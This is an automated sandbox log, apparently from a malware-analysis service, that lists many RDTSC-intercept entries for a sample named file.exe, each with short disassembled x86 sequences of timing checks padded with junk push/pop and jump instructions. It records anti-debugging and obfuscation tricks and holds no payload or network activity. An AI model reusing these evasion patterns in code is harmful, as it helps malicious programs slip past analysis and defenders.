Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED48 second address: 4DED4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED4E second address: 4DED7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA954E703D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED7C second address: 4DED88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA9551579F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED88 second address: 4DED8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED8C second address: 4DEDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA955157A04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E275F second address: 4E2763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2763 second address: 4E2769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2769 second address: 4E2773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA954E703C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2773 second address: 4E2777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4401 second address: 4E4407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4407 second address: 4E440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E66B8 second address: 4E66FE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FA954E703D6h 0x00000010 push ecx 0x00000011 jmp 00007FA954E703CAh 0x00000016 jmp 00007FA954E703D5h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E62C0 second address: 4E62C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E7B99 second address: 4E7BA3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEFF7 second address: 4EF001 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA9551579F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED8A0 second address: 4ED8A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED8A7 second address: 4ED8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA9551579F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FA9551579FDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDA2D second address: 4EDA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA954E703C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDA38 second address: 4EDA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FA9551579FCh 0x00000010 js 00007FA9551579F6h 0x00000016 jmp 00007FA955157A05h 0x0000001b push ebx 0x0000001c jnl 00007FA9551579F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDEBC second address: 4EDEDD instructions: 0x00000000 rdtsc 0x00000002 js 00007FA954E703C6h 0x00000008 jmp 00007FA954E703D7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDEDD second address: 4EDEE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDEE2 second address: 4EDEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA954E703C6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FA954E703C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491F2D second address: 491F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 491F31 second address: 491F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE1FE second address: 4EE21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA955157A07h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F154D second address: 4F1585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA954E703D5h 0x0000000a pushad 0x0000000b jnp 00007FA954E703C6h 0x00000011 jno 00007FA954E703C6h 0x00000017 jnl 00007FA954E703C6h 0x0000001d popad 0x0000001e popad 0x0000001f push ebx 0x00000020 jnp 00007FA954E703DDh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F168B second address: 4F16A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA955157A07h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F16A8 second address: 4F16C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA954E703D2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F16C3 second address: 4F16C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F16C7 second address: 4F16E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA954E703D2h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F16E9 second address: 4F16ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F16ED second address: 4F1716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA954E703CBh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1B3F second address: 4F1B54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007FA9551579F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FA9551579F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F500E second address: 4F5024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703CCh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5024 second address: 4F502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F502C second address: 4F5039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA954E703D2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5190 second address: 4F519A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA9551579F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5589 second address: 4F5591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F56F1 second address: 4F56FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FA9551579F6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F56FE second address: 4F5704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5704 second address: 4F5726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA955157A09h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCE07 second address: 4FCE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA954E703C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCE11 second address: 4FCE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCE15 second address: 4FCE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FAD5E second address: 4FAD6E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA9551579F6h 0x00000008 ja 00007FA9551579F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FAED1 second address: 4FAEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA954E703D3h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB3EB second address: 4FB441 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA9551579F6h 0x00000008 je 00007FA9551579F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA955157A07h 0x00000015 jmp 00007FA9551579FCh 0x0000001a popad 0x0000001b pushad 0x0000001c jno 00007FA955157A03h 0x00000022 jmp 00007FA9551579FAh 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB9F3 second address: 4FB9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB9F7 second address: 4FBA1A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA9551579F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA955157A05h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FBA1A second address: 4FBA3A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FA954E703D3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC2C2 second address: 4FC2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC557 second address: 4FC55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC55D second address: 4FC561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC561 second address: 4FC581 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FA954E703D7h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC82D second address: 4FC832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC832 second address: 4FC850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC850 second address: 4FC856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC856 second address: 4FC862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505ED5 second address: 505EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A00h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5052EF second address: 5052F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5052F3 second address: 5052F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5052F9 second address: 5052FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5052FF second address: 505303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5055B1 second address: 5055B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5055B7 second address: 5055BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505761 second address: 50576E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505A79 second address: 505A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA9551579F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505A83 second address: 505A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505A88 second address: 505A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D2F5 second address: 50D2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D2F9 second address: 50D31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FA9551579F6h 0x0000000d jmp 00007FA9551579FBh 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007FA955157A10h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D31D second address: 50D346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703D4h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA954E703CFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D346 second address: 50D34C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D5D9 second address: 50D61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703CDh 0x00000009 jmp 00007FA954E703D6h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FA954E703D5h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D8B4 second address: 50D8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA955157A05h 0x0000000d jbe 00007FA9551579F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D8D7 second address: 50D8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA954E703CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DA73 second address: 50DA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA955157A02h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DD94 second address: 50DD99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DD99 second address: 50DD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DD9F second address: 50DDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DED3 second address: 50DF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA955157A09h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA9551579FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DF01 second address: 50DF0B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA954E703C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50DF0B second address: 50DF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E105 second address: 50E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CD61 second address: 50CD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CD66 second address: 50CD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FA954E703C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5148DE second address: 5148E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5148E2 second address: 5148F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007FA954E703C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5145C6 second address: 5145CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521E91 second address: 521EA1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521EA1 second address: 521EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521AA9 second address: 521ABD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FA954E703C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521ABD second address: 521AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5242F3 second address: 5242F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5242F7 second address: 5242FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5278B3 second address: 5278B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5278B9 second address: 5278BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C099 second address: 52C09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536296 second address: 5362A0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA9551579F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5362A0 second address: 5362B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA954E703C6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53CF1E second address: 53CF24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0B1 second address: 53D0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA954E703C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop esi 0x00000015 jno 00007FA954E703D8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0DE second address: 53D0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
